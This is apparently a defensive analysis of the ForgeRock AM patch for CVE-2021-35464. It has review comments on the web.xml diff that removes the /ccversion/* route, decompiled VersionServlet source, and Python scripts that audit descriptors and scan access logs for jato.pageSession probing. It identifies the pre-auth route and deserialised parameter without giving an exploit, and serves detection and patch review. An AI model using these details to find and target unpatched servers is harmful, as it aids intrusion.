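Review bot: in `@@ -1200,14 +808,9 @@` the `OpenAM` servlet class changes from `org.forgerock.http.servlet.HttpFrameworkServlet` to `org.forgerock.openam.http.OpenAMHttpFrameworkServlet` without a comment on what the subclass adds; a short `<!-- -->` note next to the `<servlet-class>` line would help future readers. The `/.well-known/*` pattern that this hunk and `@@ -1164,30 +796,6 @@` take away from the Restlet `WebFinger` servlet is only re-bound to `OpenAM` in the later `@@ -1238,90 +841,22 @@` hunk, so the two should be reviewed together to confirm OpenID Connect discovery is still served.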
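Review bot: `@@ -1238,90 +841,22 @@` unmaps every console route, including `<url-pattern>/ccversion/*</url-pattern>` for `VersionServlet`, which is the pre-auth path this CVE is about, and the commit message should say so explicitly rather than leaving it implicit in a bulk console removal. The same hunk deletes the `ForgeRockRest` servlet declaration and rebinds `/xacml/*`, `/oauth2/*` and `/uma/*` to `OpenAM`; any `ForgeRockRest` mapping outside the visible context would now name an undeclared servlet, which some containers reject at deploy time, so the rest of the file should be checked for that name.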
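Review bot: `@@ -1335,106 +870,6 @@` removes the `jato.tld` / `cc.tld` taglib entries and the `com.sun.identity.console.*` servlet declarations, which matches the mappings dropped earlier, but any remaining JSP that references the `/WEB-INF/jato.tld` taglib URI will now fail at JSP compile time, so confirm the console JSPs were deleted in the same change. Nothing here removes the JATO library or the console classes from the WAR either; if a site re-applies a customised pre-fix web.xml during upgrade, `/ccversion/*` comes straight back, so consider removing the library as well and documenting that web.xml customisations must be re-based on the new file.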
The ccversion endpoint was notably removed:
- <servlet-mapping> - <servlet-name>VersionServlet</servlet-name> - <url-pattern>/ccversion/*</url-pattern> - </servlet-mapping>
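To check whether a deployed descriptor still carries the routes this change removes, here is an added Python example (mine, not ForgeRock's or AttackerKB's code). It parses a web.xml and reports every servlet-mapping that still points at a JATO console servlet, with `/ccversion/*` singled out; a mapping is caught either by its URL pattern or by the servlet class it resolves to, so a renamed route to the same servlet is still reported. The two sample descriptors are constructed from the servlet names and classes visible in the diff; the `xmlns` value on them is an assumption, and a real deployment's file is WEB-INF/web.xml inside the WAR.

```python
"""Audit a web.xml for the JATO console routes removed by the ForgeRock AM fix.

Added example, not ForgeRock or AttackerKB code. The sample descriptors are
constructed from servlet names/classes visible in the diff; the xmlns value
is an assumption (real files are WEB-INF/web.xml inside the deployed WAR).
"""
import xml.etree.ElementTree as ET

# URL patterns of the JATO-based console servlets the fix unmaps.
JATO_CONSOLE_PATTERNS = {
    "/ccversion/*", "/base/*", "/authentication/*", "/service/*", "/session/*",
    "/realm/*", "/policy/*", "/idm/*", "/user/*", "/delegation/*", "/task/*",
    "/agentconfig/*", "/federation/*", "/webservices/*", "/sts/*", "/audit/*",
}
# Every console servlet class in the diff lives under this package.
JATO_CONSOLE_PACKAGE = "com.sun.identity.console."


def _local(tag):
    """Strip a namespace prefix such as '{http://java.sun.com/xml/ns/javaee}'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(element, name):
    """Text of the first direct child with the given local name, or ''."""
    for child in element:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def find_jato_routes(web_xml_text):
    """Return sorted (url_pattern, servlet_name, servlet_class) triples for every
    servlet-mapping that still exposes a JATO console servlet.

    A mapping is flagged if its pattern is one of the removed console patterns
    or if the servlet it names is declared with a com.sun.identity.console class.
    """
    root = ET.fromstring(web_xml_text)
    classes = {}
    for el in root.iter():
        if _local(el.tag) == "servlet":
            classes[_child_text(el, "servlet-name")] = _child_text(el, "servlet-class")
    findings = []
    for el in root.iter():
        if _local(el.tag) != "servlet-mapping":
            continue
        name = _child_text(el, "servlet-name")
        pattern = _child_text(el, "url-pattern")
        cls = classes.get(name, "")
        if pattern in JATO_CONSOLE_PATTERNS or cls.startswith(JATO_CONSOLE_PACKAGE):
            findings.append((pattern, name, cls))
    return sorted(findings)


def exposes_ccversion(web_xml_text):
    """True if /ccversion/* (the pre-auth route of CVE-2021-35464) is still mapped."""
    return any(pattern == "/ccversion/*" for pattern, _, _ in find_jato_routes(web_xml_text))


# Constructed: a descriptor shaped like the pre-fix side of the diff.
PRE_FIX_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee">
  <servlet>
    <servlet-name>VersionServlet</servlet-name>
    <servlet-class>com.sun.identity.console.version.VersionServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>OpenAM</servlet-name>
    <servlet-class>org.forgerock.http.servlet.HttpFrameworkServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>VersionServlet</servlet-name>
    <url-pattern>/ccversion/*</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>OpenAM</servlet-name>
    <url-pattern>/sts-tokengen/*</url-pattern>
  </servlet-mapping>
</web-app>"""

# Constructed: the same descriptor after the fix.
POST_FIX_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee">
  <servlet>
    <servlet-name>OpenAM</servlet-name>
    <servlet-class>org.forgerock.openam.http.OpenAMHttpFrameworkServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>OpenAM</servlet-name>
    <url-pattern>/sts-tokengen/*</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>OpenAM</servlet-name>
    <url-pattern>/.well-known/*</url-pattern>
  </servlet-mapping>
</web-app>"""

if __name__ == "__main__":
    for label, text in (("pre-fix", PRE_FIX_WEB_XML), ("post-fix", POST_FIX_WEB_XML)):
        print(label, "exposes /ccversion/*:", exposes_ccversion(text), find_jato_routes(text))
```

Run it against the web.xml extracted from the deployed WAR rather than the one in the installer, since a customised descriptor re-applied during an upgrade is the usual way a removed mapping comes back.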
The original VersionServlet can be seen here:
```java
// Decompiled source of the servlet mapped to /ccversion/*. Two decompiler artifacts
// are corrected so it compiles: the path-based "WEB-INF.classes." package prefix is
// dropped, and the parent class is named in full instead of via a clashing import.
package com.sun.identity.console.version;

import com.iplanet.jato.CompleteRequestException;
import com.iplanet.jato.RequestContext;
import com.iplanet.jato.RequestContextImpl;
import com.iplanet.jato.ViewBeanManager;
import com.iplanet.jato.view.ViewBean;
import com.sun.identity.console.base.AMViewBeanBase;
import com.sun.identity.console.version.VersionViewBean;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;

public class VersionServlet extends com.sun.web.ui.servlet.version.VersionServlet {

    protected void initializeRequestContext(RequestContext requestContext) {
        super.initializeRequestContext(requestContext);
        // View beans are looked up in this servlet's own package.
        ViewBeanManager viewBeanManager = new ViewBeanManager(requestContext,
                getPackageName(com.sun.identity.console.version.VersionServlet.class.getName()));
        ((RequestContextImpl) requestContext).setViewBeanManager(viewBeanManager);
    }

    protected void onRequestHandlerNotFound(RequestContext requestContext, String handlerName)
            throws ServletException {
        AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotFound: " + handlerName);
    }

    protected void onRequestHandlerNotSpecified(RequestContext requestContext)
            throws ServletException {
        AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotSpecified");
    }

    // Any other exception: log it and redirect to the generic error page.
    protected void onUncaughtException(RequestContext requestContext, Exception e)
            throws ServletException, IOException {
        HttpServletRequest httpRequest = requestContext.getRequest();
        AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
        String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMUncaughtException";
        requestContext.getResponse().sendRedirect(redirectUrl);
    }

    // Called by JATO when deserialising the jato.pageSession parameter throws.
    // The handler only logs (reusing the onUncaughtException label, as in the
    // original), redirects to /base/AMInvalidURL and ends the request.
    protected void onPageSessionDeserializationException(RequestContext requestContext,
            ViewBean viewBean, Exception e) throws ServletException, IOException {
        HttpServletRequest httpRequest = requestContext.getRequest();
        AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
        String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMInvalidURL";
        requestContext.getResponse().sendRedirect(redirectUrl);
        throw new CompleteRequestException();
    }

    protected void onSessionTimeout(RequestContext requestContext) throws ServletException {
    }
}
```
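The error handlers above double as a detection hook: a request whose jato.pageSession value fails to deserialise on `/ccversion/*` is answered with a 302 to `/base/AMInvalidURL`. The following is an added Python example (not ForgeRock's or AttackerKB's code) that scans web-server access-log lines in Combined Log Format for requests to the removed route and tags those carrying a `jato.pageSession` query parameter or answered with that redirect. The sample lines are constructed; the IPs, timestamps, the `/openam` context path and the `Version` page name in them are invented.

```python
"""Flag requests to the removed JATO /ccversion/ route in access logs.

Added example, not ForgeRock or AttackerKB code. Input is Combined Log
Format; the sample lines below are constructed (IPs, timestamps, the
/openam context path and the Version page name are invented).
"""
import re
from urllib.parse import parse_qs, urlsplit

# ip ident user [timestamp] "METHOD target HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return the list of reasons an entry is suspicious (empty if none).

    ccversion-request        any hit on the console route the fix removed
    jato-pagesession         the query string carries jato.pageSession, the
                             parameter the servlet deserialises
    deserialization-redirect a 302 from /ccversion/, the response both error
                             handlers in VersionServlet produce; a POST body is
                             not logged, so this is the only signal when the
                             parameter travels in the body
    """
    url = urlsplit(entry["target"])
    if "/ccversion/" not in url.path:
        return []
    reasons = ["ccversion-request"]
    if "jato.pageSession" in parse_qs(url.query):
        reasons.append("jato-pagesession")
    if entry["status"] == 302:
        reasons.append("deserialization-redirect")
    return reasons


def scan(lines):
    """Return (ip, method, path, status, reasons) for each suspicious line."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["method"], urlsplit(entry["target"]).path,
                             entry["status"], reasons))
    return findings


# Constructed sample log; the jato.pageSession value is a placeholder, not real data.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2021:12:00:01 +0000] "GET /openam/ccversion/Version'
    '?jato.pageSession=PLACEHOLDER_BASE64 HTTP/1.1" 302 0 "-" "python-requests/2.25"',
    '198.51.100.4 - - [10/Jul/2021:12:00:05 +0000] "GET /openam/oauth2/authorize HTTP/1.1" '
    '200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jul/2021:12:00:09 +0000] "GET /openam/ccversion/Version HTTP/1.1" '
    '200 4331 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Jul/2021:12:00:12 +0000] "POST /openam/ccversion/Version HTTP/1.1" '
    '302 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

On a patched server every `/ccversion/` hit is a 404, so any entry with `ccversion-request` is worth a look on its own; on an unpatched one the `jato-pagesession` and `deserialization-redirect` tags separate probing from ordinary console use, and the server-side debug log entry `VersionServlet.onUncaughtException` written by the handler above confirms which requests reached the deserialisation error path.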
More details can be found in the PortSwigger writeup.